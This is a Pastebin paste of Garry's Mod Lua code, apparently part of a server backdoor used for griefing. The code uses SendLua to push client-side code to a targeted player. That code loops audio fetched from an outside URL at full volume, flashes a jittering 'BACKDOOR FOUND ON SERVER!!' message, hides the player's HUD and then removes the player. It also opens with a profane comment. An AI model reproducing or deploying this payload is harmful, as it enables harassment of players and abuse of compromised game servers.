Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --FUCKING CUNTS
- lol:PushAction( 0, function( pPlayer )
- lol:SendLua( pPlayer, [[
- surface.PlaySound( "vo/npc/male01/gethellout.wav" )
- local sounds = {}
- for i = 1, 4 do
- sound.PlayURL( "http://www.underdone.org/leak/underdone/asd.mp3", "noblock noplay", function( pChan )
- sounds[#sounds +1] = pChan
- end )
- end
- draw.SimpleTextOutlined(
- "BACKDOOR FOUND ON SERVER!! ",
- "DermaLarge",
- ScrW() /2 +math.random( -8, 8 ),
- ScrH() /2 +math.random( -8, 8 ) +24,
- Color( 255, 0, 0 ),
- TEXT_ALIGN_CENTER,
- TEXT_ALIGN_CENTER,
- 1,
- Color( 255, 0, 0 )
- )
- end)
- timer.Create( "asdf", 1, 0, function()
- if #sounds ~= 4 then return end
- timer.Destroy( "asdf" )
- for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 1 ) v:Play() end
- end )
- hook.Add( "HUDShouldDraw", "newhud", function() return false end )
- ]] )
- pPlayer:Remove()
- end )
Advertisement
Add Comment
Please, Sign In to add comment